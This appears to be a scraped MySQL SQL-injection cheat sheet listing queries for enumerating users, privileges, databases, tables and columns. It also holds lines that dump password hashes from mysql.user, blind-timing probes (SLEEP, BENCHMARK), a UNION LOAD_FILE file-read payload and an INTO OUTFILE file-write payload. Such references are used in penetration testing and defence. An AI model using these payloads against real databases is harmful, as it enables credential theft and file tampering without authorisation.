Copy SELECT 1; #comment
SELECT /*comment*/1;
Copy SELECT user();
SELECT system_user();
SELECT user FROM mysql.user; -- priv
CREATE USER <name> IDENTIFIED BY '<pass>';
DROP USER <name>;
GRANT ALL PRIVILEGES ON *.* TO <name>@'%';
SELECT grantee, privilege_type, is_grantable FROM information_schema.user_privileges WHERE privilege_type = 'SUPER';
SELECT host, user FROM mysql.user WHERE Super_priv = 'Y';
Copy SELECT grantee, privilege_type, is_grantable FROM information_schema.user_privileges;
SELECT host, user, Select_priv, Insert_priv, Update_priv, Delete_priv, Create_priv, Drop_priv, Reload_priv, Shutdown_priv, Process_priv, File_priv, Grant_priv, References_priv, Index_priv, Alter_priv, Show_db_priv, Super_priv, Create_tmp_table_priv, Lock_tables_priv, Execute_priv, Repl_slave_priv, Repl_client_priv FROM mysql.user;
SELECT grantee, table_schema, privilege_type FROM information_schema.schema_privileges
SELECT table_schema, table_name, column_name, privilege_type FROM information_schema.column_privileges;
Copy SELECT database()
SELECT schema_name FROM information_schema.schemata; -- for MySQL >= v5.0
SELECT distinct(db) FROM mysql.db;
SELECT @@datadir;
Copy SELECT table_schema,table_name FROM information_schema.tables WHERE table_schema != 'mysql' AND table_schema != 'information_schema';
Copy SELECT table_schema, table_name, column_name FROM information_schema.columns WHERE table_schema != 'mysql' AND table_schema != 'information_schema';
Copy SELECT table_schema, table_name FROM information_schema.columns WHERE column_name = ‘’;
Copy SELECT username FROM (SELECT ROWNUM r, username FROM all_users ORDER BY username) WHERE r=<nth>;
Copy SELECT substr('<string>', <start>, <end>); # returns c
SELECT char(65); # returns A
SELECT ascii('A'); # returns 65
SELECT 0×414243; # returns ABC
Casting SELECT cast('1' AS unsigned integer);
SELECT cast('123' AS char);
SELECT CONCAT('A','B','C');
Copy SELECT if(1=1,'foo','bar');
SELECT CASE WHEN (1=1) THEN 'A' ELSE 'B' END;
Copy SELECT BENCHMARK(1000000,MD5('A'));
SELECT SLEEP(<seconds>); # >= 5.0.12
Copy SELECT host, user, password FROM mysql.user; --priv
Copy …' UNION ALL SELECT LOAD_FILE('<readable file>'); #SQLi
Copy SELECT * FROM mytable INTO <name> '<path to name>';
UNION SELECT ("<payload>") INTO OUTFILE '<path> ' -- -'